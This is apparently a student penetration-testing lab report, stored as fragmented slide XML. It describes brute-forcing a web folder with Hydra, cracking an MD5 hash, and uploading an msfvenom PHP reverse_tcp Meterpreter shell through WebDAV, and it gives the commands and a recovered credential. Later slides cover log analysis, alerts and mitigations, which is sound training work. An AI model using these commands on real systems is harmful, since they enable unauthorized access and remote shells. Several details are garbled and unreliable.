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 Thin"/>
      <p:regular r:id="rId33"/>
      <p:bold r:id="rId34"/>
      <p:italic r:id="rId35"/>
      <p:boldItalic r:id="rId36"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black"/>
      <p:bold r:id="rId37"/>
      <p:boldItalic r:id="rId38"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium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Robot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C4CA94-7E52-42AB-B813-A823B7F806D4}">
  <a:tblStyle styleId="{91C4CA94-7E52-42AB-B813-A823B7F806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.fntdata"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-boldItalic.fntdata"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium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Thin-regular.fntdata"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide26.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-italic.fntdata"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-bold.fntdata"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-bold.fntdata"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-boldItalic.fntdata"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-regular.fntdata"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack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Roboto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13eb3bd17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113eb3bd17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13eb3bd17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113eb3bd17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116de6346b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116de6346b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16de6346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116de6346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7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3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46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Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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53.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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64.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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71.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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81.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image74.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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89.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image90.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image100.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image97.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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7.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11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8.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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2.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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3.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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9.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image115.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image117.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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0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CrackStation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1121" name="Google Shape;1121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getting into Astons credentials new information was there about Ryan's Credentials. I found ryan’s MD5 Hash.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4" name="Google Shape;1124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25" name="Google Shape;112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6" name="Google Shape;112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7" name="Google Shape;1127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8" name="Google Shape;1128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9" name="Google Shape;112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0" name="Google Shape;1130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used the Crackstation website to find out what Ryan’s password was for the webdav server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2" name="Google Shape;1132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33" name="Google Shape;113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4" name="Google Shape;113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5" name="Google Shape;1135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See next slide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CrackStation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1142" name="Google Shape;1142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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="2934274"/>
            <a:ext cx="2371500" cy="17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Crackstation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successful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encryption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Ryans password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5" name="Google Shape;11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50" y="4077525"/>
            <a:ext cx="8285699" cy="6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300" y="2207913"/>
            <a:ext cx="6407126" cy="14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64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="-12300" y="751725"/>
            <a:ext cx="3299400" cy="1456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file after Ashtons logging into Astons </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>credentials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Reverse_tcp Payload</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1153" name="Google Shape;1153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65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5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tools I used was Kali Linux and Msfvenom and Msfconsole.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Command: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msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.90 lport=4444 -f raw -o shell.php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9D1D9"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="0D11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C9D1D9"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="0D11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6" name="Google Shape;1156;p65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57" name="Google Shape;1157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8" name="Google Shape;1158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9" name="Google Shape;1159;p65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60" name="Google Shape;1160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1" name="Google Shape;1161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2" name="Google Shape;1162;p65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5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successfully was able to create a reverse_tcp shell and placed in into the Webdav server. Once activated I was able to listen in with Meterpreter, after I was able to locate the flag.txt.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4" name="Google Shape;1164;p65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65" name="Google Shape;1165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6" name="Google Shape;1166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7" name="Google Shape;1167;p65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65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9" name="Google Shape;11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00" y="3368251"/>
            <a:ext cx="7800975" cy="13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1175" y="1481363"/>
            <a:ext cx="186690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Reverse_tcp Payload</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1176" name="Google Shape;1176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6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66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1480625"/>
            <a:ext cx="21111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After loading the shell into the Webdav and confirmed it on the website side and clicked on the shell.php. I was able to listen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9" name="Google Shape;1179;p6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80" name="Google Shape;1180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1" name="Google Shape;1181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" name="Google Shape;1182;p66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83" name="Google Shape;1183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4" name="Google Shape;1184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5" name="Google Shape;1185;p66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6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7" name="Google Shape;1187;p66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88" name="Google Shape;1188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9" name="Google Shape;1189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0" name="Google Shape;1190;p66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6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2" name="Google Shape;119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500" y="667200"/>
            <a:ext cx="6184675" cy="31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188" y="3912913"/>
            <a:ext cx="7800975" cy="9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Reverse_tcp Payload</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1199" name="Google Shape;1199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67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67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1480625"/>
            <a:ext cx="21111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was able to get into the root directory “/” and  find the next flag.txt file.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02" name="Google Shape;1202;p67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03" name="Google Shape;1203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04" name="Google Shape;1204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5" name="Google Shape;1205;p67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206" name="Google Shape;1206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07" name="Google Shape;1207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8" name="Google Shape;1208;p67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67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10" name="Google Shape;1210;p67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211" name="Google Shape;1211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12" name="Google Shape;1212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3" name="Google Shape;1213;p67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67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5" name="Google Shape;121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650" y="648250"/>
            <a:ext cx="5607451" cy="398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550" y="1402073"/>
            <a:ext cx="2848125" cy="22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Google Shape;122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68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3" name="Google Shape;1223;p6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29" name="Google Shape;1229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69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1" name="Google Shape;1231;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="639875"/>
            <a:ext cx="4911000" cy="1007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started on 02/16/22 @ 1500 hrs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12,060 connections </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>occurred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> at the peak, of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> ip 192.168.1.90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Sudden peaks in network traffic indicate there was a port scan.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1232" name="Google Shape;123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300" y="1753750"/>
            <a:ext cx="6450675" cy="32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9" name="Google Shape;1239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0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1" name="Google Shape;1241;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="792050" y="658725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When the request started 16,597 for the hidden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> secret_folder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files requested was in the secret folder the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> contained allowed me to upload a payload to exploit other vulnerabilities </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1242" name="Google Shape;124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73" y="1818950"/>
            <a:ext cx="7209326" cy="29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9" name="Google Shape;1249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71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="965975" y="638075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16,597 requests were made in the attack to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> the /secret_folder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4129 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>successful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> attacks with a 200 HTTP code</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1251" name="Google Shape;12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75" y="733900"/>
            <a:ext cx="424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00" y="1467800"/>
            <a:ext cx="5148398" cy="32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313" y="1467800"/>
            <a:ext cx="76866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9" name="Google Shape;1259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72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1" name="Google Shape;1261;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1007275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156 requests were made to access the webdav folder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Main files were requested were password.dav and shell.php</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1262" name="Google Shape;126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75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50" y="1166375"/>
            <a:ext cx="682942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9325" y="2296175"/>
            <a:ext cx="4551650" cy="26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73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1" name="Google Shape;1271;p7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77" name="Google Shape;1277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74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 recommend an alert to be sent once every 800 connections occur in an hour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Threshold would be set to 500 to activate the alarm </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1279" name="Google Shape;1279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Regularly run a system port scan to be proactive and audit open ports. Set a fire wall and regularly patch it to minimize attacks and make sure the firewall runs in real time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solution would Nmap your own ports to monitor what is open then audit from there. Command: Nmap -sV 1-105, -sV IP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85" name="Google Shape;1285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detect unauthorized access on the hidden files i would set up an alert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 would make the threshold of max 3 attempts per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>hour</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> that an alert would be sent.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1287" name="Google Shape;1287;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4497425" y="14108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Use Network IDS to configure unwanted access in the network.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Renaming folders containing sensitive data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Encrypt data that is confidential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Block IPs that are not the common IPs that access the files.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93" name="Google Shape;1293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7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 would set an alarm for an 401 error that is returned (unauthorized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>credentials). Also an alert for spike in network traffic requests.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Threshold for for the alarm would be 7 errors that are returned, and the spike in traffic would be 500 or more.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95" name="Google Shape;1295;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1380175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 would set a protocol for login attempts of 5 then a 20 min wait time, and password would have to complex and changed every 90 days. Also a have a list of blocked IPs that set off the alarm of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>unsuccessful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> attempts within 3 months.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301" name="Google Shape;1301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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1397425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 would set an alarm on the HTTP GET requests that is trying to access the webdav from any IP. Also i would make a trusted IP addresses to confirm outside IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>attempts.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would be set to any HTTP PUT request made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03" name="Google Shape;1303;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1481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 would set trusted IP addresses and ensure the firewall security policy prevents access to all others.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Also I would mitigate other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>strategies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> that would only let </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> to WebDAV to permitted users.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309" name="Google Shape;1309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7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 would set up an alert for port 4444 of any traffic trying to access it, and setting up an alrt if any files were uploaded on to the /webdav.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would be 2 or more attempts on the /webdav folder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11" name="Google Shape;1311;p7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Block all Ips unless on the trusted list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Set the access to the /webdav folder to read only to prevent any payloads to be uploaded and have necessary ports open.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Hyper-V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Kali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Keli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425" y="936975"/>
            <a:ext cx="6827399" cy="3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{91C4CA94-7E52-42AB-B813-A823B7F806D4}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Testing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 System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10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IP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{91C4CA94-7E52-42AB-B813-A823B7F806D4}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CVE-2-17-157710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httpd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52525"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                        </a:rPr>
                        <a:t>The Accept-Language header value to lookup the right charset encoding when verifying the user's credentials. If the header value is not present in the charset conversion table, a fallback mechanism is used to truncate it to a two characters value to allow a quick retry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access to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confidential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files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 attacker to gain access to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confidential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files and able to gain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in the system.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injection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across all directories on the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inject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malicious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scripts into any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infect the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with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malicious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script in any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91" name="Google Shape;1091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92" name="Google Shape;1092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93" name="Google Shape;1093;p61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{91C4CA94-7E52-42AB-B813-A823B7F806D4}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 passwords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If a password is not salted it can be cracked websites such as www.crackstation.com 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Its an easy system to access by use of a brute force attack with common passwords using such programs as Hydra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LFY Vulnerability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into confidential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allows attackers to gain access to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credentials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Common passwords and lack of complexity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Hannah, Ryan and Aston all had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predictable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passwords and were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discover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by simple program and social engineering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Hydra Brute force attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1099" name="Google Shape;1099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soon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we found some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information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on the usernames we can now do a Brute force attack Aston had a common password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within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our password list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03" name="Google Shape;110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06" name="Google Shape;110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7" name="Google Shape;110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8" name="Google Shape;1108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successfully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found Ashston’s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credentials. By using the Hydra command and exploiting the login credentials (ashton/leopoldo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0" name="Google Shape;1110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11" name="Google Shape;1111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2" name="Google Shape;1112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3" name="Google Shape;1113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Hydra -L ashton -p /usr/share/wordlists/rockou.txt -s 80 -f -vV 192.168.105 http-get /company_folders/secret_folder/.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5" name="Google Shape;11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275" y="3372662"/>
            <a:ext cx="7304851" cy="1459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